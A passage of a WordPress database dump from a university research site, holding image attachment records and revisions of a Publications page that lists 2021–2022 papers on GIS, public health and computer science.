14:37:14','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/Armin-Mikler_300x300.jpeg',0,'attachment','image/jpeg',0),(690,1,'2022-03-23 10:37:14','2022-03-23 14:37:14','','bourgeois','','inherit','open','closed','','bourgeois','','','2022-03-23 10:37:14','2022-03-23 14:37:14','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/bourgeois.jpeg',0,'attachment','image/jpeg',0),(692,1,'2022-03-23 10:37:14','2022-03-23 14:37:14','','sunderraman1','','inherit','open','closed','','sunderraman1','','','2022-03-23 10:37:14','2022-03-23 14:37:14','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/sunderraman1.jpeg',0,'attachment','image/jpeg',0),(693,1,'2022-03-23 10:37:14','2022-03-23 14:37:14','','Taylor-shelton_300x300','','inherit','open','closed','','taylor-shelton_300x300','','','2022-03-23 10:37:14','2022-03-23 14:37:14','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/Taylor-shelton_300x300.jpeg',0,'attachment','image/jpeg',0),(694,1,'2022-03-23 10:37:14','2022-03-23 14:37:14','','zelikovsky','','inherit','open','closed','','zelikovsky','','','2022-03-23 10:37:14','2022-03-23 14:37:14','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/zelikovsky.jpeg',0,'attachment','image/jpeg',0),(695,1,'2022-03-23 10:37:32','2022-03-23 14:37:32','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Armin-Mikler_300x300.jpeg','cropped-Armin-Mikler_300x300.jpeg','','inherit','open','closed','','cropped-armin-mikler_300x300-jpeg','','','2022-03-23 10:37:32','2022-03-23 14:37:32','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Armin-Mikler_300x300.jpeg',0,'attachment','image/jpeg',0),(696,1,'2022-03-23 10:40:03','2022-03-23 14:40:03','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-bourgeois.jpeg','cropped-bourgeois.jpeg','','inherit','open','closed','','cropped-bourgeois-jpeg','','','2022-03-23 10:40:03','2022-03-23 14:40:03','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-bourgeois.jpeg',0,'attachment','image/jpeg',0),(704,1,'2022-03-23 10:58:13','2022-03-23 14:58:13','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-zelikovsky.jpeg','cropped-zelikovsky.jpeg','','inherit','open','closed','','cropped-zelikovsky-jpeg','','','2022-03-23 10:58:13','2022-03-23 14:58:13','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-zelikovsky.jpeg',0,'attachment','image/jpeg',0),(705,1,'2022-03-23 10:58:28','2022-03-23 14:58:28','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Taylor-shelton_300x300.jpeg','cropped-Taylor-shelton_300x300.jpeg','','inherit','open','closed','','cropped-taylor-shelton_300x300-jpeg','','','2022-03-23 10:58:28','2022-03-23 14:58:28','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Taylor-shelton_300x300.jpeg',0,'attachment','image/jpeg',0),(708,1,'2022-03-23 11:21:49','2022-03-23 15:21:49','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-Armin-Mikler_300x300-1.jpeg','cropped-cropped-Armin-Mikler_300x300-1.jpeg','','inherit','open','closed','','cropped-cropped-armin-mikler_300x300-1-jpeg','','','2022-03-23 11:21:49','2022-03-23 15:21:49','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-Armin-Mikler_300x300-1.jpeg',0,'attachment','image/jpeg',0),(770,1,'2022-03-23 22:38:31','2022-03-24 02:38:31','','Bhavya','','inherit','open','closed','','bhavya','','','2022-03-23 22:38:31','2022-03-24 02:38:31','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/Bhavya.jpg',0,'attachment','image/jpeg',0),(771,1,'2022-03-23 22:38:35','2022-03-24 02:38:35','','Reshmanjali','','inherit','open','closed','','reshmanjali','','','2022-03-23 22:38:35','2022-03-24 02:38:35','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/Reshmanjali.jpeg',0,'attachment','image/jpeg',0);
INSERT INTO `wp_posts` VALUES (772,1,'2022-03-23 22:38:36','2022-03-24 02:38:36','','Sarah_Akinola','','inherit','open','closed','','sarah_akinola','','','2022-03-23 22:38:36','2022-03-24 02:38:36','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/Sarah_Akinola.jpg',0,'attachment','image/jpeg',0),(773,1,'2022-03-23 22:38:39','2022-03-24 02:38:39','','Sundos_Al_Subhi','','inherit','open','closed','','sundos_al_subhi','','','2022-03-23 22:38:39','2022-03-24 02:38:39','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/Sundos_Al_Subhi.jpg',0,'attachment','image/jpeg',0),(775,1,'2022-03-23 22:39:29','2022-03-24 02:39:29','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Reshmanjali.jpeg','cropped-Reshmanjali.jpeg','','inherit','open','closed','','cropped-reshmanjali-jpeg','','','2022-03-23 22:39:29','2022-03-24 02:39:29','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Reshmanjali.jpeg',0,'attachment','image/jpeg',0),(776,1,'2022-03-23 22:39:41','2022-03-24 02:39:41','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Bhavya-scaled-1.jpg','cropped-Bhavya-scaled-1.jpg','','inherit','open','closed','','cropped-bhavya-scaled-1-jpg','','','2022-03-23 22:39:41','2022-03-24 02:39:41','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Bhavya-scaled-1.jpg',0,'attachment','image/jpeg',0),(777,1,'2022-03-23 22:41:04','2022-03-24 02:41:04','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Sarah_Akinola-scaled-1.jpg','cropped-Sarah_Akinola-scaled-1.jpg','','inherit','open','closed','','cropped-sarah_akinola-scaled-1-jpg','','','2022-03-23 22:41:04','2022-03-24 02:41:04','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Sarah_Akinola-scaled-1.jpg',0,'attachment','image/jpeg',0),(784,1,'2022-03-23 23:35:14','2022-03-24 03:35:14','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Sundos_Al_Subhi-1.jpg','cropped-Sundos_Al_Subhi-1.jpg','','inherit','open','closed','','cropped-sundos_al_subhi-1-jpg','','','2022-03-23 23:35:14','2022-03-24 03:35:14','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Sundos_Al_Subhi-1.jpg',0,'attachment','image/jpeg',0),(793,1,'2022-03-24 22:01:44','2022-03-25 02:01:44','','colibri-image-104.png','','inherit','open','closed','','colibri-image-104-png','','','2022-03-24 22:01:44','2022-03-25 02:01:44','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/colibri-image-104.png',0,'attachment','image/png',0),(794,1,'2022-03-24 22:01:45','2022-03-25 02:01:45','','colibri-image-105.png','','inherit','open','closed','','colibri-image-105-png','','','2022-03-24 22:01:45','2022-03-25 02:01:45','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/colibri-image-105.png',0,'attachment','image/png',0),(795,1,'2022-03-24 22:01:46','2022-03-25 02:01:46','','colibri-image-106.png','','inherit','open','closed','','colibri-image-106-png','','','2022-03-24 22:01:46','2022-03-25 02:01:46','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/colibri-image-106.png',0,'attachment','image/png',0),(796,1,'2022-03-24 22:01:46','2022-03-25 02:01:46','','colibri-image-107.png','','inherit','open','closed','','colibri-image-107-png','','','2022-03-24 22:01:46','2022-03-25 02:01:46','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/colibri-image-107.png',0,'attachment','image/png',0),(810,1,'2022-03-24 22:15:35','2022-03-25 02:15:35','','Anvith','','inherit','open','closed','','anvith','','','2022-03-24 22:15:35','2022-03-25 02:15:35','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/Anvith.jpg',0,'attachment','image/jpeg',0),(812,1,'2022-03-24 22:15:39','2022-03-25 02:15:39','','Brindal','','inherit','open','closed','','brindal','','','2022-03-24 22:15:39','2022-03-25 02:15:39','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/Brindal.jpeg',0,'attachment','image/jpeg',0),(813,1,'2022-03-24 22:15:40','2022-03-25 02:15:40','','Bronson','','inherit','open','closed','','bronson','','','2022-03-24 22:15:40','2022-03-25 02:15:40','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/Bronson.png',0,'attachment','image/png',0),(814,1,'2022-03-24 22:15:44','2022-03-25 02:15:44','','Ruby','','inherit','open','closed','','ruby','','','2022-03-24 22:15:44','2022-03-25 02:15:44','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/Ruby.jpg',0,'attachment','image/jpeg',0),(816,1,'2022-03-24 22:17:51','2022-03-25 02:17:51','','Vineeth','','inherit','open','closed','','vineeth','','','2022-03-24 22:17:51','2022-03-25 02:17:51','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/Vineeth.jpg',0,'attachment','image/jpeg',0),(817,1,'2022-03-24 22:18:09','2022-03-25 02:18:09','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Bronson.png','cropped-Bronson.png','','inherit','open','closed','','cropped-bronson-png','','','2022-03-24 22:18:09','2022-03-25 02:18:09','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Bronson.png',0,'attachment','image/png',0),(819,1,'2022-03-24 22:18:29','2022-03-25 02:18:29','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Ruby.jpg','cropped-Ruby.jpg','','inherit','open','closed','','cropped-ruby-jpg','','','2022-03-24 22:18:29','2022-03-25 02:18:29','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Ruby.jpg',0,'attachment','image/jpeg',0),(821,1,'2022-03-24 22:19:15','2022-03-25 02:19:15','https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-cropped-cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1.webp','cropped-cropped-cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1.webp','','inherit','open','closed','','cropped-cropped-cropped-eyj3ijoymdq4lcjoijoymdq4lcjzy29wzsi6imfwccj9-1-webp','','','2022-03-24 22:19:15','2022-03-25 02:19:15','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-cropped-cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1.webp',0,'attachment','image/webp',0),(830,1,'2022-03-24 22:23:48','2022-03-25 02:23:48','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Brindal.jpeg','cropped-Brindal.jpeg','','inherit','open','closed','','cropped-brindal-jpeg','','','2022-03-24 22:23:48','2022-03-25 02:23:48','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Brindal.jpeg',0,'attachment','image/jpeg',0),(831,1,'2022-03-24 22:24:02','2022-03-25 02:24:02','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Vineeth.jpg','cropped-Vineeth.jpg','','inherit','open','closed','','cropped-vineeth-jpg','','','2022-03-24 22:24:02','2022-03-25 02:24:02','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Vineeth.jpg',0,'attachment','image/jpeg',0),(832,1,'2022-03-24 22:24:17','2022-03-25 02:24:17','https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-cropped-cropped-cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1.webp','cropped-cropped-cropped-cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1.webp','','inherit','open','closed','','cropped-cropped-cropped-cropped-eyj3ijoymdq4lcjoijoymdq4lcjzy29wzsi6imfwccj9-1-webp','','','2022-03-24 22:24:17','2022-03-25 02:24:17','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/02/cropped-cropped-cropped-cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1.webp',0,'attachment','image/webp',0),(835,1,'2022-03-24 22:55:45','2022-03-25 02:55:45','','Basit','','inherit','open','closed','','basit','','','2022-03-24 22:57:26','2022-03-25 02:57:26','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/Basit.jpg',0,'attachment','image/jpeg',0),(852,1,'2022-03-25 10:15:00','2022-03-25 14:15:00','','ruby_parcells','','inherit','open','closed','','ruby_parcells','','','2022-03-25 10:15:00','2022-03-25 14:15:00','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/ruby_parcells.jpg',0,'attachment','image/jpeg',0),(853,1,'2022-03-25 10:15:13','2022-03-25 14:15:13','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-ruby_parcells-scaled-1.jpg','cropped-ruby_parcells-scaled-1.jpg','','inherit','open','closed','','cropped-ruby_parcells-scaled-1-jpg','','','2022-03-25 10:15:13','2022-03-25 14:15:13','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-ruby_parcells-scaled-1.jpg',0,'attachment','image/jpeg',0),(861,1,'2022-03-25 10:51:32','2022-03-25 14:51:32','','Alex','','inherit','open','closed','','alex','','','2022-03-29 21:30:30','2022-03-30 01:30:30','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/Alex.jpg',0,'attachment','image/jpeg',0),(862,1,'2022-03-25 10:51:33','2022-03-25 14:51:33','','Ardavan','','inherit','open','closed','','ardavan','','','2022-03-25 10:51:33','2022-03-25 14:51:33','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/Ardavan.jpg',0,'attachment','image/jpeg',0),(863,1,'2022-03-25 10:51:38','2022-03-25 14:51:38','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Ardavan.jpg','cropped-Ardavan.jpg','','inherit','open','closed','','cropped-ardavan-jpg','','','2023-10-13 10:18:15','2023-10-13 14:18:15','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Ardavan.jpg',0,'attachment','image/jpeg',0),(873,1,'2022-03-25 10:53:29','2022-03-25 14:53:29','','Angelique','','inherit','open','closed','','angelique','','','2022-03-25 10:53:29','2022-03-25 14:53:29','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/Angelique.jpg',0,'attachment','image/jpeg',0),(874,1,'2022-03-25 10:53:32','2022-03-25 14:53:32','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Angelique.jpg','cropped-Angelique.jpg','','inherit','open','closed','','cropped-angelique-jpg','','','2023-10-13 10:24:42','2023-10-13 14:24:42','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Angelique.jpg',0,'attachment','image/jpeg',0),(913,1,'2022-03-29 22:25:54','2022-03-30 02:25:54','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Custom\",\"attrs\":{\"id\":\"custom\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"id\":\"608-c4\",\"parentId\":\"608-c3\",\"partialId\":608,\"children\":[{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"608-c4\",\"index\":0,\"id\":\"608-c5\",\"partialId\":608,\"styleRef\":420,\"type\":\"content\",\"props\":{\"content\":\"<p><strong>2022<\\/strong><\\/p><p>Atkinson, S. F., Kala, A. K., &amp; Tiwari, C. (2022). Cascading effects of COVID-19 on population mobility and air quality: An exploration including place characteristics using geovisualization. Geospatial Health, 17(s1).<\\/p><p>Angelique B.Willis, Mildred Addo, Lauren E.Yoder, Cassandra K. Johnson, Sydney L. Resler, Leticia J. Young, Elizabeth Armstrong-Mensah. Individual and Community Level Factors Related to Sanitation, Water Quality, Treatment and Management in Rural Communities in Accra, Ghana: A Field Study Report.<\\/p><p><strong>2021<\\/strong><\\/p><p>Northeim, K., Tiwari, C., &amp; Oppong, J. (2021). Surface ozone monitoring and policy: A geospatial decision support tool for suitable location of monitoring stations in urban areas. Environmental Science &amp; Policy, 126, 48-59.<\\/p><p>Gwalani, H., Tiwari, C., &amp; Mikler, A. R. (2021). Evaluation of heuristics for the p-median problem: Scale and spatial demand distribution. Computers, Environment and Urban Systems, 88, 101656.<\\/p><p>Torres, A. V., Tiwari, C., &amp; Atkinson, S. F. (2021). Progress in ecosystem services research: A guide for scholars and practitioners. Ecosystem Services, 49, 101267.<\\/p><p>Northeim, K., Marks, C., &amp; Tiwari, C. (2021). Evaluating spatial patterns of seasonal ozone exposure and incidence of respiratory emergency room visits in Dallas-Fort Worth. PeerJ, 9, e11066.<\\/p><p>Haynes, D., &amp; Tiwari, C. (2021). Space-time Classification Index for Assessing COVID-19 Hotspots. medRxiv.<\\/p><p>Oppong, J., &amp; Tiwari, C. (2021). GIS and Spatial Representations: Challenges and Missteps. In COVID-19 and Similar Futures (pp. 417-422). Springer, Cham.<\\/p><p>O\\u2019Neill, M., Poole, M., &amp; Mikler, A. R. (2021). A Synergistic Approach to Data-Driven Response Planning. Disaster medicine and public health preparedness, 15(2), 232-238.<\\/p><p>Irany, F. A., Iyer, A., Flores, R. B., &amp; Mikler, A. R. (2021). The Multi-phase spatial meta-heuristic algorithm for public health emergency transportation. arXiv preprint arXiv:2107.04125.<\\/p><p>Qian, W., Bhowmick, S., O\\u2019Neill, M., Ramisetty-Mikler, S., &amp; Mikler, A. R. (2021). Applying a Probabilistic Infection Model for studying contagion processes in contact networks. Journal of Computational Science, 54, 101419.<\\/p><p>Gu, Q., Formby, D., Ji, S., Saltaformaggio, B., Bourgeois, A., &amp; Beyah, R. A. (2021). This Hacker Knows Physics: Device Physics Aware Mimicry Attacks in Cyber-Physical Systems. IEEE Transactions on Dependable and Secure Computing.<\\/p><p>Huang, Y., Cai, Z., Pang, J., Xie, Z., &amp; Bourgeois, A. G. (2021, June). Game Theory Based Privacy Protection for Context-Aware Services with Long-Term Time Series Data. In ICC 2021-IEEE International Conference on Communications (pp. 1-6). IEEE.<\\/p><p>Rosen, A., Levin, B., &amp; Bourgeois, A. G. (2021, June). Autonomous Load Balancing in Distributed Hash Tables Using Churn and the Sybil Attack. In 2021 IEEE International Parallel and Distributed Processing Symposium Workshops (IPDPSW) (pp. 631-640). IEEE.<\\/p><p>Tharpe, B., Bourgeois, A. G., &amp; Ashok, A. (2021, June). A do-it-yourself computer vision based robotic ball throw trainer. In Proceedings of the 19th Annual International Conference on Mobile Systems, Applications, and Services (pp. 505-506).<\\/p><p>Huang, Y., Li, W., Wang, J., Cai, Z., &amp; Bourgeois, A. G. (2021). Privacy protection among three antithetic-parties for context-aware services. Journal of Network and Computer Applications, 191, 103115.<\\/p><p>Sidharthan, S., Ashok, A., &amp; Bourgeois, A. (2021, October). Internet service via UAV: user centric comprehensive attack surface analysis. In Proceedings of the 12th ACM Wireless of the Students, by the Students, and for the Students (S3) Workshop (pp. 1-2).<\\/p><p>Younis, A. A., Sunderraman, R., Metzler, M., &amp; Bourgeois, A. G. (2021). Developing parallel programming and soft skills: A project based learning approach. Journal of Parallel and Distributed Computing, 158, 151-163.<\\/p><p>Ye, H., Yang, X., Takac, M., Sunderraman, R., &amp; Ji, S. (2021). Improving text-to-image synthesis using contrastive learning. arXiv preprint arXiv:2107.02423.<\\/p><p>Abeysinghe, B., Shah, D., Freas, C., Harrison, R., &amp; Sunderraman, R. (2021). POSLAN: Disentangling Chat with Positional and Language encoded Post Embeddings. arXiv preprint arXiv:2107.03529.<\\/p><p>Srimath, S., Ye, Y., Sarker, K., Sunderraman, R., &amp; Ji, S. (2021, October). Human Activity Recognition from RGB Video Streams Using 1D-CNNs. In 2021 IEEE SmartWorld, Ubiquitous Intelligence &amp; Computing, Advanced &amp; Trusted Computing, Scalable Computing &amp; Communications, Internet of People and Smart City Innovation (SmartWorld\\/SCALCOM\\/UIC\\/ATC\\/IOP\\/SCI) (pp. 295-302). IEEE.<\\/p><p>Younis, A. A., Sunderraman, R., Metzler, M., &amp; Bourgeois, A. G. (2021). Developing parallel programming and soft skills: A project based learning approach. Journal of Parallel and Distributed Computing, 158, 151-163.<\\/p><p>Kleinsasser, M., Tharpe, B., Akula, N., Tirumani, H., Sunderraman, R., &amp; Bourgeois, A. G. (2022, January). Detecting and Predicting Sleep Activity using Biometric Sensor Data. In 2022 14th International Conference on COMmunication Systems &amp; NETworkS (COMSNETS) (pp. 19-24). IEEE.<\\/p>\"}}],\"styleRef\":419,\"type\":\"content\"}],\"id\":\"608-c3\",\"parentId\":\"608-c2\",\"partialId\":608,\"styleRef\":418,\"type\":\"content\"}],\"id\":\"608-c2\",\"parentId\":\"608-c1\",\"partialId\":608,\"styleRef\":417,\"type\":\"content\"}],\"id\":\"608-c1\",\"partialId\":608,\"styleRef\":413,\"type\":\"content\"}','','','inherit','closed','closed','','612-revision-v1','','','2022-03-29 22:25:54','2022-03-30 02:25:54','',612,'https://gsudice.dataconn.net/?p=913',0,'revision','',0),(914,1,'2022-03-29 22:25:54','2022-03-30 02:25:54','<div data-colibri-id=\"608-c1\" class=\"style-413 style-local-608-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"608-c2\" id=\"custom\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-417 style-local-608-c2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"608-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-418 style-local-608-c3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-419-outer style-local-608-c4-outer\">\n            <div data-colibri-id=\"608-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-419 style-local-608-c4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"608-c5\" class=\"h-text h-text-component style-420 style-local-608-c5 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><strong>2022</strong></p>\n                    <p>Atkinson, S. F., Kala, A. K., &amp; Tiwari, C. (2022). Cascading effects of COVID-19 on population mobility and air quality: An exploration including place characteristics using geovisualization. Geospatial Health, 17(s1).</p>\n                    <p>Angelique B.Willis, Mildred Addo, Lauren E.Yoder, Cassandra K. Johnson, Sydney L. Resler, Leticia J. Young, Elizabeth Armstrong-Mensah. Individual and Community Level Factors Related to Sanitation, Water Quality, Treatment and Management\n                      in Rural Communities in Accra, Ghana: A Field Study Report.</p>\n                    <p><strong>2021</strong></p>\n                    <p>Northeim, K., Tiwari, C., &amp; Oppong, J. (2021). Surface ozone monitoring and policy: A geospatial decision support tool for suitable location of monitoring stations in urban areas. Environmental Science &amp; Policy, 126, 48-59.</p>\n                    <p>Gwalani, H., Tiwari, C., &amp; Mikler, A. R. (2021). Evaluation of heuristics for the p-median problem: Scale and spatial demand distribution. Computers, Environment and Urban Systems, 88, 101656.</p>\n                    <p>Torres, A. V., Tiwari, C., &amp; Atkinson, S. F. (2021). Progress in ecosystem services research: A guide for scholars and practitioners. Ecosystem Services, 49, 101267.</p>\n                    <p>Northeim, K., Marks, C., &amp; Tiwari, C. (2021). Evaluating spatial patterns of seasonal ozone exposure and incidence of respiratory emergency room visits in Dallas-Fort Worth. PeerJ, 9, e11066.</p>\n                    <p>Haynes, D., &amp; Tiwari, C. (2021). Space-time Classification Index for Assessing COVID-19 Hotspots. medRxiv.</p>\n                    <p>Oppong, J., &amp; Tiwari, C. (2021). GIS and Spatial Representations: Challenges and Missteps. In COVID-19 and Similar Futures (pp. 417-422). Springer, Cham.</p>\n                    <p>O’Neill, M., Poole, M., &amp; Mikler, A. R. (2021). A Synergistic Approach to Data-Driven Response Planning. Disaster medicine and public health preparedness, 15(2), 232-238.</p>\n                    <p>Irany, F. A., Iyer, A., Flores, R. B., &amp; Mikler, A. R. (2021). The Multi-phase spatial meta-heuristic algorithm for public health emergency transportation. arXiv preprint arXiv:2107.04125.</p>\n                    <p>Qian, W., Bhowmick, S., O’Neill, M., Ramisetty-Mikler, S., &amp; Mikler, A. R. (2021). Applying a Probabilistic Infection Model for studying contagion processes in contact networks. Journal of Computational Science, 54, 101419.</p>\n                    <p>Gu, Q., Formby, D., Ji, S., Saltaformaggio, B., Bourgeois, A., &amp; Beyah, R. A. (2021). This Hacker Knows Physics: Device Physics Aware Mimicry Attacks in Cyber-Physical Systems. IEEE Transactions on Dependable and Secure Computing.</p>\n                    <p>Huang, Y., Cai, Z., Pang, J., Xie, Z., &amp; Bourgeois, A. G. (2021, June). Game Theory Based Privacy Protection for Context-Aware Services with Long-Term Time Series Data. In ICC 2021-IEEE International Conference on Communications\n                      (pp. 1-6). IEEE.</p>\n                    <p>Rosen, A., Levin, B., &amp; Bourgeois, A. G. (2021, June). Autonomous Load Balancing in Distributed Hash Tables Using Churn and the Sybil Attack. In 2021 IEEE International Parallel and Distributed Processing Symposium Workshops (IPDPSW)\n                      (pp. 631-640). IEEE.</p>\n                    <p>Tharpe, B., Bourgeois, A. G., &amp; Ashok, A. (2021, June). A do-it-yourself computer vision based robotic ball throw trainer. In Proceedings of the 19th Annual International Conference on Mobile Systems, Applications, and Services\n                      (pp. 505-506).</p>\n                    <p>Huang, Y., Li, W., Wang, J., Cai, Z., &amp; Bourgeois, A. G. (2021). Privacy protection among three antithetic-parties for context-aware services. Journal of Network and Computer Applications, 191, 103115.</p>\n                    <p>Sidharthan, S., Ashok, A., &amp; Bourgeois, A. (2021, October). Internet service via UAV: user centric comprehensive attack surface analysis. In Proceedings of the 12th ACM Wireless of the Students, by the Students, and for the Students\n                      (S3) Workshop (pp. 1-2).</p>\n                    <p>Younis, A. A., Sunderraman, R., Metzler, M., &amp; Bourgeois, A. G. (2021). Developing parallel programming and soft skills: A project based learning approach. Journal of Parallel and Distributed Computing, 158, 151-163.</p>\n                    <p>Ye, H., Yang, X., Takac, M., Sunderraman, R., &amp; Ji, S. (2021). Improving text-to-image synthesis using contrastive learning. arXiv preprint arXiv:2107.02423.</p>\n                    <p>Abeysinghe, B., Shah, D., Freas, C., Harrison, R., &amp; Sunderraman, R. (2021). POSLAN: Disentangling Chat with Positional and Language encoded Post Embeddings. arXiv preprint arXiv:2107.03529.</p>\n                    <p>Srimath, S., Ye, Y., Sarker, K., Sunderraman, R., &amp; Ji, S. (2021, October). Human Activity Recognition from RGB Video Streams Using 1D-CNNs. In 2021 IEEE SmartWorld, Ubiquitous Intelligence &amp; Computing, Advanced &amp; Trusted\n                      Computing, Scalable Computing &amp; Communications, Internet of People and Smart City Innovation (SmartWorld/SCALCOM/UIC/ATC/IOP/SCI) (pp. 295-302). IEEE.</p>\n                    <p>Younis, A. A., Sunderraman, R., Metzler, M., &amp; Bourgeois, A. G. (2021). Developing parallel programming and soft skills: A project based learning approach. Journal of Parallel and Distributed Computing, 158, 151-163.</p>\n                    <p>Kleinsasser, M., Tharpe, B., Akula, N., Tirumani, H., Sunderraman, R., &amp; Bourgeois, A. G. (2022, January). Detecting and Predicting Sleep Activity using Biometric Sensor Data. In 2022 14th International Conference on COMmunication\n                      Systems &amp; NETworkS (COMSNETS) (pp. 19-24). IEEE.</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','Publications','','inherit','closed','closed','','608-revision-v1','','','2022-03-29 22:25:54','2022-03-30 02:25:54','',608,'https://gsudice.dataconn.net/?p=914',0,'revision','',0),(920,1,'2022-03-29 22:26:08','2022-03-30 02:26:08','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Custom\",\"attrs\":{\"id\":\"custom\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"id\":\"608-c4\",\"parentId\":\"608-c3\",\"partialId\":608,\"children\":[{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"608-c4\",\"index\":0,\"id\":\"608-c5\",\"partialId\":608,\"styleRef\":420,\"type\":\"content\",\"props\":{\"content\":\"<p><strong>2022<\\/strong><\\/p><p>Atkinson, S. F., Kala, A. K., &amp; Tiwari, C. (2022). Cascading effects of COVID-19 on population mobility and air quality: An exploration including place characteristics using geovisualization. Geospatial Health, 17(s1).<\\/p><p>Angelique B.Willis, Mildred Addo, Lauren E.Yoder, Cassandra K. Johnson, Sydney L. Resler, Leticia J. Young, Elizabeth Armstrong-Mensah(2022). Individual and Community Level Factors Related to Sanitation, Water Quality, Treatment and Management in Rural Communities in Accra, Ghana: A Field Study Report.<\\/p><p><strong>2021<\\/strong><\\/p><p>Northeim, 